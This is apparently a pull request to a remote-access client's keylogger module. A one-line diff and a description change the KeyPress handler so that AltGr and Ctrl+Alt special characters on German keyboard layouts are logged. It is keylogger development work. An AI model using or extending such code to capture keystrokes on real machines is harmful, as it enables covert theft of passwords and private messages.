### PR TITLE
#194 fix

### DIFF
--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -129,7 +129,7 @@ namespace xClient.Core.Keylogger
         //This method should be used to process all of our unicode characters
         private void Logger_KeyPress(object sender, KeyPressEventArgs e) //Called second
         {
-            if (_pressedKeys.IsModifierKeysSet())
+            if (_pressedKeys.IsModifierKeysSet() && _pressedKeys.Contains((Keys)char.ToUpper(e.KeyChar)))
                 return;
 
             if (!_pressedKeyChars.Contains(e.KeyChar) || !LoggerHelper.DetectKeyHolding(_pressedKeyChars, e.KeyChar))


### PR DESCRIPTION
Bear in mind this does not fix the Alt Gr keypresses.  Pressing this key will still produce the same symbols/behaviors when the keylogger is not enabled.

What this fix does: we are receiving the character value for a KeyPress and we are handling it by ignoring it if any modifier keys are set.  In this case "Ctrl + Alt" which I will be trying to accomplish in a later fix (if I can figure out how to do this).

For example, a user with a german keyboard layout presses (Ctrl + alt + 2), which is the same as AltGr + 2, the call to our PressedKeys list will do the following

-check if key modifiers are set
-check if the list contains a key with a character value that is comparable to a key

If the key is  a normal character, for example user presses (Ctrl + Alt + k) on a german keyboard layout, the result would be true and the method would return, ignoring appending the character 'k' to the log

If the key is not a normal character that is comparable to the value of a Key, our call will fall through to the next call, and add the character that is returned.  For example, user presses (Ctrl + Alt + 2) to produce the special character, the Keys enum values won't contain a key with that symbol and our list won't either so it will fall through and print the special character